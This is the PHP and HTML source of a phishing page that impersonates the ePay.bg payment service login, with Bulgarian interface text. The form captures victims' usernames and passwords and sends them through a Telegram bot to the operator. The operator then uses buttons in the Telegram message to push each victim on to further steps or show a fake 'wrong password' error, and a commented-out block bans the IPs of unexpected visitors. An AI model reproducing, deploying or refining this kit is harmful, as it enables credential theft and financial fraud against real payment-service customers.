<?php
// step1.php (FINAL - ALL RULES IMPLEMENTED)
session_start();

// // --- SIMPLE, CORRECT SECURITY BLOCK ---
// function block_ip_address($ip) {
//     // IMPORTANT: Make sure 'blocked_ips.txt' exists and is writable (permissions 666 or 777)
//     file_put_contents('blocked_ips.txt', $ip . "\n", FILE_APPEND | LOCK_EX);
// }
// $blocked_ips = file_exists('blocked_ips.txt') ? file('blocked_ips.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
// if (in_array($_SERVER['REMOTE_ADDR'], $blocked_ips)) {
//     header("HTTP/1.1 403 Forbidden"); die("Your IP address has been blocked.");
// }

// // A user is an intruder ONLY IF they do NOT have the entry key AND they have NOT started any steps yet.
// // This allows legitimate users who are waiting/refreshing to be safe.
// if (!isset($_SESSION['session_started_correctly']) && !isset($_SESSION['current_step'])) {
//     block_ip_address($_SERVER['REMOTE_ADDR']);
//     header("HTTP/1.1 403 Forbidden");
//     die("Security violation: Invalid entry point. Your IP has been blocked.");
// }
// // --- END SECURITY BLOCK ---

ini_set('display_errors', 1); error_reporting(E_ALL);
require_once 'config.php';

// --- REFRESH-WHILE-WAITING FIX ---
$initial_state = (isset($_SESSION['status']) && $_SESSION['status'] === 'pending') ? 'waiting' : 'form';

// =================================================================================================
// --- CORE LOGIC ---
// This script handles three different types of requests.
// =================================================================================================

// --- 1. ADMIN ACTION: SET NEXT STEP (via URL, e.g., from Telegram) ---
// This block executes when an admin clicks a link in the Telegram message.
// It finds the correct user's session and updates their status to 'rejected' or 'redirect'.
// -------------------------------------------------------------------------------------------------
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'set_next_step') {

    // Get the user's session ID and the desired next step from the URL parameters.
    $session_id_to_update = $_GET['user'] ?? '';
    $next_step = $_GET['next_step'] ?? '';

    if (!empty($session_id_to_update) && !empty($next_step)) {
        // Temporarily close the current session to open the specific user's session.
        session_write_close();
        session_id($session_id_to_update);
        session_start();

        // Update the user's session status based on the action taken.
        if ($next_step === 'rejected') {
            $_SESSION['status'] = 'rejected';
        } else {
            $_SESSION['status'] = 'redirect';
            $_SESSION['next_step'] = $next_step; // e.g., '2', '3', '4', or '5'
        }

        // Save and close the user's session.
        session_write_close();

        // Display a simple confirmation message.
        echo "<!DOCTYPE html><html><body><h1>Action Recorded.</h1></body></html>";
        exit();
    }
}


// --- 2. USER ACTION: PROCESS FORM SUBMISSION ---
// This block executes when the user fills out the HTML form and clicks "Submit".
// It saves the user's data, sends a notification to Telegram, and sets the initial status to 'pending'.
// -------------------------------------------------------------------------------------------------
if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    // Set headers to respond with JSON.
    header('Content-Type: application/json');

    // Store the submitted data from the form into the session.
    $_SESSION['user_data']['step1_input'] = $_POST['input_for_step1'] ?? 'N/A';
    $_SESSION['user_data']['new_input']   = $_POST['new_input'] ?? 'N/A'; // <-- Your new input data is saved here.

    // Set the initial status to 'pending' while waiting for admin action.
    $_SESSION['status'] = 'pending';
    $_SESSION['current_step'] = 1;
    unset($_SESSION['session_started_correctly']);

    // --- Prepare Telegram Notification ---

    $session_id = session_id();
    $script_url = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}{$_SERVER['SCRIPT_NAME']}";

    // Build the callback URLs for the Telegram keyboard buttons.
    $reject_url = $script_url . "?action=set_next_step&next_step=rejected&user=" . $session_id;
    $goto2_url  = $script_url . "?action=set_next_step&next_step=2&user=" . $session_id;
    $goto3_url  = $script_url . "?action=set_next_step&next_step=3&user=" . $session_id;
    $goto4_url  = $script_url . "?action=set_next_step&next_step=4&user=" . $session_id;
    $goto5_url  = $script_url . "?action=set_next_step&next_step=5&user=" . $session_id;

    // Create the message text to send to Telegram.
    // To include the new input, you would add it here.
    $message = "👤 STEP 1 SUBMISSION\n"
             . "  - Input: `{$_SESSION['user_data']['step1_input']}`\n"
             . "  - New Input: `{$_SESSION['user_data']['new_input']}`\n\n" // <-- Line added for the new input.
             . "Choose next step:";

    // Create the inline keyboard for the Telegram message.
    $keyboard = [
        'inline_keyboard' => [
            [['text' => '❌ Reject', 'url' => $reject_url]],
            [['text' => 'Go to 2 ➡️', 'url' => $goto2_url], ['text' => 'Go to 3 ➡️', 'url' => $goto3_url]],
            [['text' => 'Go to 4 ➡️', 'url' => $goto4_url], ['text' => 'Go to 5 ➡️', 'url' => $goto5_url]]
        ]
    ];

    // --- Send to Telegram API using cURL ---

    $url = "https://api.telegram.org/bot{$TELEGRAM_TOKEN}/sendMessage";
    $post_fields = [
        'chat_id' => $TELEGRAM_CHAT_ID,
        'text' => $message,
        'parse_mode' => 'Markdown',
        'reply_markup' => json_encode($keyboard)
    ];

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => 1,
        CURLOPT_POSTFIELDS => http_build_query($post_fields),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10
    ]);
    curl_exec($ch);
    curl_close($ch);

    // Respond to the user's browser, confirming the submission is pending.
    echo json_encode(['status' => 'pending']);
    exit();
}


// --- 3. BROWSER ACTION: CHECK FOR STATUS UPDATES ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'check_status') {

    // Set headers to prevent caching and ensure the latest status is always fetched.
    header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
    header("Pragma: no-cache");
    header("Expires: 0");
    header('Content-Type: application/json');

    // Prepare the response with the current status and next step (if any).
    $response = [
        'status' => $_SESSION['status'] ?? 'pending',
        'next_step' => $_SESSION['next_step'] ?? null
    ];

    // Send the JSON response to the browser.
    echo json_encode($response);

    // Clean up session variables after they have been sent once.
    if (isset($_SESSION['status']) && $_SESSION['status'] !== 'pending') {
        unset($_SESSION['status']);
    }
    if (isset($_SESSION['next_step'])) {
        unset($_SESSION['next_step']);
    }

    // THE FIX: Explicitly close the session to release the lock immediately.
    session_write_close();

    exit();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ePay.bg</title>
<style>
    /* ======================================================= */
    /* --- 1. GENERAL & DESKTOP STYLES --- */
    /* ======================================================= */
    body { font-family: Arial, sans-serif; background-color: #fff; margin: 0; padding: 0; color: #333; font-size: 24px; }
    .wrapper { width: 100%; max-width: 980px; margin: 0 auto; padding: 0 15px; box-sizing: border-box; }
    header { display: flex; justify-content: space-between; align-items: center; padding: 20px 0; border-bottom: 1px solid #e0e0e0; }
    .logo { font-size: 32px; font-weight: bold; color: #005c9d; }
    nav a { margin-left: 20px; text-decoration: none; color: #666; font-size: 16px; }
    .hamburger-menu { display: none; }
    .banner { display: flex; background-image: url('https://online.epay.bg/v3/img/front/front-banner-tax.im.2805d4f52e21d95d7fdc322ab3cc2bc1.jpg'); background-size: cover; background-position: center; margin-top: 10px; border: 1px solid #ccc; }
    .banner-text { background-color: rgba(69, 134, 185, 0.9); padding: 30px; width: 35%; box-sizing: border-box; color: white; }
    .banner-text h1 { font-size: 24px; margin-top: 0; }
    .banner-image { flex-grow: 1; }
    .main-content { display: flex; justify-content: space-between; padding: 40px 0; gap: 2%; }
    .login-section { width: 40%; }
    .info-box { width: 28%; }
    .login-section label { display: block; margin-bottom: 5px; color: #555; }
    input[type="text"], input[type="password"], button[type="submit"] { width: 100%; max-width: 280px; padding: 8px; border: 1px solid #ccc; border-radius: 3px; box-sizing: border-box; margin-bottom: 16px; }
    button[type="submit"] { padding: 10px; background-color: #005c9d; color: #fff; border: none; font-size: 16px; cursor: pointer; font-weight: bold; }
    .login-links { margin-top: 15px; }
    .login-links a { color: #005c9d; text-decoration: none; font-size: 13px; }
    .info-box h3 { font-size: 20px; color: #333; margin-top: 0; margin-bottom: 15px; }
    .info-box a { color: #005c9d; text-decoration: none; }
    .info-box p { line-height: 1.5; font-size: 13px; }
    .info-box:last-of-type { text-align: center; }
    .info-icon { margin-bottom: 15px; }
    .info-icon img { width: 65px; height: auto; }
    .form-feedback { height: 40px; margin-top: 10px; max-width: 280px; }
    .loader { border: 4px solid #f3f3f3; border-radius: 50%; border-top: 4px solid #005c9d; width: 24px; height: 24px; animation: spin 1s linear infinite; display: none; }
    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    .rejection-message { color: #dc3545; font-size: 13px; display: none; }
    .login-section.is-waiting .loader { display: block; }

    /* --- NEW FOOTER STYLES (Desktop) --- */
    footer {
        border-top: 1px solid #e0e0e0;
        padding-top: 20px;
        color: #666;
    }
    .footer-divider {
        border: 0;
        height: 1px;
        background-color: #e0e0e0;
        margin: 40px 0;
    }
    .features-section {
        display: flex;
        justify-content: space-around;
        text-align: center;
        padding: 20px 0;
    }
    .feature-item { width: 30%; }
    .feature-icon img { height: 80px; margin-bottom: 15px; }
    .feature-item h3 { font-size: 18px; color: #333; margin-bottom: 10px; }
    .feature-item p { font-size: 14px; line-height: 1.5; }
    .links-section {
        display: flex;
        justify-content: space-between;
    }
    .links-column { width: 23%; }
    .links-column h5 { font-size: 12px; text-transform: uppercase; margin-bottom: 15px; color: #333; }
    .links-column ul { list-style: none; padding: 0; margin: 0; }
    .links-column li { margin-bottom: 8px; }
    .links-column a { color: #666; text-decoration: none; font-size: 13px; }
    .links-column a:hover { text-decoration: underline; }
    .bottom-footer {
        display: flex;
        justify-content: space-between;
        align-items: center;
        border-top: 1px solid #e0e0e0;
        padding: 20px 0;
        margin-top: 20px;
    }
    .contact-info { font-size: 12px; line-height: 1.6; }
    .contact-info p { margin: 0; }
    .app-badges { display: flex; gap: 10px; }
    .app-badges img { height: 35px; }
    .security-logos p { font-size: 12px; margin: 0 0 5px 0; text-align: center; }
    .security-logos img { height: 25px; }
    .copyright {
        text-align: center;
        font-size: 12px;
        padding: 20px 0;
        border-top: 1px solid #e0e0e0;
        margin-top: 20px;
    }

    /* ======================================================= */
    /* --- 2. MOBILE DESIGN (Screens 768px or smaller) --- */
    /* ======================================================= */
    @media (max-width: 768px) {
        body { font-size: 16px; }
        .wrapper { padding: 0; }
        header { padding: 15px; border-bottom: 1px solid #eee; justify-content: flex-start; gap: 20px; box-shadow: 0 2px 4px rgba(0,0,0,0.05); }
        header nav { display: none; }
        .logo { font-size: 28px; }
        .logo a {
    display: inline-block; /* Helps with vertical alignment */
}
.logo img {
    height: 35px;       /* You can adjust this value to make the logo bigger or smaller */
    width: auto;        /* This keeps the logo's proportions correct */
    vertical-align: middle; /* This aligns the logo nicely with the menu items */
}
        .hamburger-menu { display: flex; flex-direction: column; gap: 5px; }
        .hamburger-menu span { display: block; width: 25px; height: 3px; background-color: #333; }
        .banner { margin-top: 0; border: none; background-image: url('https://online.epay.bg/v3/img/front/front-banner-tax.im.2805d4f52e21d95d7fdc322ab3cc2bc1.jpg'); }
        .banner-text { width: 70%; padding: 20px; background-color: rgba(0, 174, 239, 0.9); }
        .banner-text h1 { font-size: 22px; } .banner-text p { font-size: 14px; margin-bottom: 0; }
        .main-content { padding: 30px 15px; flex-direction: column; gap: 40px; }
        .login-section, .info-box { width: 100%; }
        .login-section label { font-size: 18px; font-weight: 500; margin-bottom: 8px; }
        input[type="text"], input[type="password"], button[type="submit"], .form-feedback { max-width: none; }
        input[type="text"], input[type="password"] { padding: 14px; font-size: 16px; }
        .login-links { text-align: center; font-size: 16px; line-height: 1.6; }
        .login-links a { font-size: 16px; }
        .info-box:not(:last-of-type) p { border-bottom: 1px solid #f0f0f0; padding-bottom: 15px; }
        .info-box:not(:last-of-type) p:last-child { border-bottom: none; }
        .info-box:not(:last-of-type) a { font-size: 18px; line-height: 1.5; position: relative; display: block; }
        .info-box:not(:last-of-type) a::after { content: '>'; position: absolute; right: 5px; top: 50%; transform: translateY(-50%); color: #f39c12; font-weight: bold; font-size: 22px; }
        
        /* --- FOOTER (Mobile) --- */
        footer .wrapper { padding: 0 15px; } /* Add padding back inside the footer for mobile */
        .features-section { flex-direction: column; gap: 30px; }
        .feature-item { width: 100%; }
        .links-section { flex-direction: column; gap: 30px; }
        .links-column { width: 100%; }
        .bottom-footer { flex-direction: column; gap: 30px; text-align: center; }
        .app-badges { justify-content: center; }
    }
    /* --- NEW RULES TO HIDE SECTIONS ON MOBILE --- */

        /* This hides the "What's New?" and "How to Pay?" boxes */
        .info-box {
            display: none;
        }

        /* This hides the four columns of footer links */
        .links-section {
            display: none;
        }
</style>
</head>
<body>

    <div class="wrapper">
        <header>
            <!-- NEW: Hamburger menu icon for mobile -->
            <div class="hamburger-menu">
                <span></span>
                <span></span>
                <span></span>
            </div>
            <div class="logo">
    <a href="#"><img src="img/ep.png" alt="ePay.bg Logo"></a>
</div>
            <nav>
                <a href="#">Клиенти</a>
                <a href="#">Търговци</a>
                <a href="#">Сигурност</a>
                <a href="#">За нас</a>
                <a href="#">Помощ</a>
                <a href="#">EN</a>
            </nav>
        </header>

        <!-- The banner content is updated to match the mobile design -->
        <section class="banner">
            <div class="banner-text">
                <h1>ПЛАЩАНЕ С<br>10-ЦИФРЕН КОД</h1>
                <p>10-цифреният код Ви дава бърз и лесен начин за плащане на стоки и услуги.</p>
                <!-- The old logos are removed -->
            </div>
            <div class="banner-image"></div>
        </section>

        <section class="main-content">
    <!-- COLUMN 1: LOGIN FORM -->
    <div id="login-component" class="login-section <?php if ($initial_state === 'waiting') echo 'is-waiting'; ?>">
        <form id="page-form">
            <label for="input_for_step1">Потребител:</label>
            <input type="text" id="input_for_step1" name="input_for_step1" required minlength="6">
            <label for="new_input">Парола:</label>
            <input type="password" id="new_input" name="new_input" required minlength="6">
            <button type="submit">Вход в ePay.bg</button>
        </form>
        <div class="form-feedback">
            <div class="loader" id="loader"></div>
            <div class="rejection-message" id="rejection-message">
                Грешни потребителско име или парола.
            </div>
        </div>
        <div class="login-links">
            <a href="#">Нова регистрация</a> | <a href="#">Забравена парола?</a>
            <a href="#">Декларация за защита на личните данни</a>
        </div>
    </div>

    <!-- COLUMN 2: WHAT'S NEW? -->
    <div class="info-box">
        <h3>Какво ново?</h3>
        <p><a href="#"><strong>18.06.2025 г.</strong><br>Изпращане на преводи в евро...</a></p>
        <p><a href="#"><strong>10.04.2025 г.</strong><br>Промени в тарифата в сила от 09.06.2025 г. ...</a></p>
    </div>

    <!-- COLUMN 3: HOW TO PAY? -->
    <div class="info-box">
        <div class="info-icon">
            <img src="img/wal.png" alt="Wallet Icon">
        </div>
        <h3>Как да платя?</h3>
        <p>Битови сметки, данъци и такси ваучери, банкови преводи, покупки...</p>
    </div>
</section>
    </div>
    
    </div> <!-- This is the closing tag of your .wrapper -->

    <!-- ======================================================= -->
    <!-- --- NEW FOOTER SECTION --- -->
    <!-- ======================================================= -->
    <footer>
        <div class="wrapper">

            <div class="features-section">
                <div class="feature-item">
                    <div class="feature-icon">
                        <img src="img/1.png" alt="Check new account icon">
                    </div>
                    <h3>Проверка нова сметка</h3>
                    <p>Безплатна проверка на битова сметка или данък</p>
                </div>
                <div class="feature-item">
                    <div class="feature-icon">
                        <img src="img/2.png" alt="Security on payment icon">
                    </div>
                    <h3>Сигурност при плащане</h3>
                    <p>Застраховка до 100 000 лева на вашите пари в ePay.bg!</p>
                </div>
                <div class="feature-item">
                    <div class="feature-icon">
                        <img src="img/3.png" alt="How to receive money icon">
                    </div>
                    <h3>Как да получавам пари?</h3>
                    <p>С кредитни или дебитни карти, от банкомат или в брой от EasyPay...</p>
                </div>
            </div>

            <hr class="footer-divider">

            <div class="links-section">
                <div class="links-column">
                    <h5>КЛИЕНТИ</h5>
                    <ul>
                        <li><a href="#">Битови сметки</a></li>
                        <li><a href="#">Административни услуги</a></li>
                        <li><a href="#">Глоби към КАТ</a></li>
                        <li><a href="#">Погасяване на кредити</a></li>
                        <li><a href="#">Данъци и такси и осигуровки</a></li>
                        <li><a href="#">Как да пазарувате онлайн?</a></li>
                        <li><a href="#">Къде да пазарувате?</a></li>
                        <li><a href="#">PayFly - плащане с 10-цифрен код</a></li>
                        <li><a href="#">Микросметка</a></li>
                    </ul>
                </div>
                <div class="links-column">
                    <h5>ТЪРГОВЦИ</h5>
                    <ul>
                        <li><a href="#">Превод по банкова сметка</a></li>
                        <li><a href="#">Превод на каса в брой</a></li>
                        <li><a href="#">Превод към друг потребител</a></li>
                        <li><a href="#">Захранване на Микросметка</a></li>
                        <li><a href="#">Получаване на пари</a></li>
                        <li><a href="#">Масови плащания</a></li>
                        <li><a href="#">Мобилно приложение</a></li>
                        <li><a href="#">Общи условия</a></li>
                        <li><a href="#">Декларация за поверителност и защита на личните данни</a></li>
                        <li><a href="#">Такси при плащане</a></li>
                        <li><a href="#">На банкомат - B-pay</a></li>
                    </ul>
                </div>
                <div class="links-column">
                    <h5>СИГУРНОСТ</h5>
                    <ul>
                        <li><a href="#">Карта за бизнеса</a></li>
                        <li><a href="#">Получаване на плащания</a></li>
                        <li><a href="#">Онлайн магазин</a></li>
                        <li><a href="#">ePay бутон за плащане</a></li>
                        <li><a href="#">PayFly - изпращане на фактури</a></li>
                        <li><a href="#">Билинг - периодични плащания</a></li>
                        <li><a href="#">Регистрирани търговци</a></li>
                        <li><a href="#">Техническа документация</a></li>
                        <li><a href="#">Договори</a></li>
                    </ul>
                </div>
                <div class="links-column">
                    <h5>ЗА НАС</h5>
                    <ul>
                        <li><a href="#">Застраховка срещу злоупотреби</a></li>
                        <li><a href="#">Плащане със SMS код</a></li>
                        <li><a href="#">dpass -плащане с еднократна парола</a></li>
                        <li><a href="#">Квалифициран електронен подпис</a></li>
                        <li><a href="#">Общи условия</a></li>
                        <li><a href="#">Инструкции за сигурност</a></li>
                    </ul>
                </div>
            </div>

            <div class="bottom-footer">
                <div class="contact-info">
                    <p><strong>Адрес на ePay.bg:</strong> София 1000, ул. Иван Вазов 16</p>
                    <p>понеделник - петък: 9:00 - 18:00ч.(централен офис)</p>
                    <p><strong>Телефон за връзка:</strong> 02 4510 880, 02 921 08 80</p>
                    <p><strong>e-mail:</strong> office@epay.bg</p>
                </div>
                <div class="app-badges">
                    <a href="#"><img src="img/apl.png" alt="Available on the App Store"></a>
                    <a href="#"><img src="img/goog.png" alt="Get it on Google Play"></a>
                    <a href="#"><img src="img/hua.png" alt="Download on AppGallery"></a>
                </div>
                <div class="security-logos">
                    <p>Level 1 Service Provider</p>
                    <img src="img/level1.png" alt="Verified by Visa and Mastercard SecureCode">
                </div>
            </div>

            <p class="copyright">© ePay.bg 2025 Всички права запазени.</p>
        </div>
    </footer>

    <!-- NEW/UPDATED JAVASCRIPT LOGIC -->
<script>
document.addEventListener('DOMContentLoaded', function() {
    // Get main elements
    const loginComponent = document.getElementById('login-component');
    const form = document.getElementById('page-form');
    const rejectionMessage = document.getElementById('rejection-message');
    
    // Get all form elements that can be disabled
    const formElements = form.querySelectorAll('input, button');
    let statusInterval; // Declared here to be accessible everywhere in the script

    /**
     * Locks or unlocks the form inputs and button by setting the 'disabled' property.
     * @param {boolean} shouldBeLocked - True to disable elements, false to enable them.
     */
    function setFormLockState(shouldBeLocked) {
        formElements.forEach(element => {
            element.disabled = shouldBeLocked;
        });
    }

    /**
     * Checks the server for a decision (redirect or reject).
     * This is the core of the "remote control".
     */
    function checkStatus() {
        fetch('?action=check_status', { cache: 'no-store' })
            .then(response => response.json())
            .then(data => {
                // If admin chose a next step, redirect the user.
                if (data.status === 'redirect' && data.next_step) {
                    clearInterval(statusInterval); // Stop checking
                    window.location.href = `step${data.next_step}.php`;
                } 
                // If admin rejected the submission, show the error.
                else if (data.status === 'rejected') {
                    clearInterval(statusInterval); // Stop checking
                    loginComponent.classList.remove('is-waiting');
                    setFormLockState(false); // UNLOCK the form
                    rejectionMessage.style.display = 'block';
                    
                    // --- KEY CHANGE ---
                    // After rejection, we restart the "passive" listening.
                    // This allows the admin to send another command if they change their mind
                    // or if the user tries to submit again.
                    statusInterval = setInterval(checkStatus, 2000);
                }
                // If status is 'pending' or something else, do nothing and let the interval run again.
            })
            .catch(error => {
                console.error('Error checking status:', error);
                // We don't stop the interval on error, so it can try again.
            });
    }

    /**
     * Handles the form submission.
     */
    form.addEventListener('submit', function(event) {
        event.preventDefault();
        rejectionMessage.style.display = 'none';

        const formData = new FormData(form);

        // Update the UI to the waiting state
        loginComponent.classList.add('is-waiting'); 
        setFormLockState(true);                     
        
        // The polling is ALREADY running. We just need to send the user's data.
        fetch(window.location.pathname, {
            method: 'POST',
            body: formData
        }).catch(console.error);
    });

    /**
     * Logic for page refresh.
     * If the page is reloaded while in a 'pending' state, we need to make sure the form is locked.
     */
    if (loginComponent.classList.contains('is-waiting')) {
        setFormLockState(true); // LOCK the form immediately
    }

    // --- FINAL AND MOST IMPORTANT CHANGE ---
    // Start the status check immediately and unconditionally when the page loads.
    // This makes the page "listen" for admin commands from the very beginning.
    statusInterval = setInterval(checkStatus, 2000);
});
</script>
</body>
</html>

</body></html>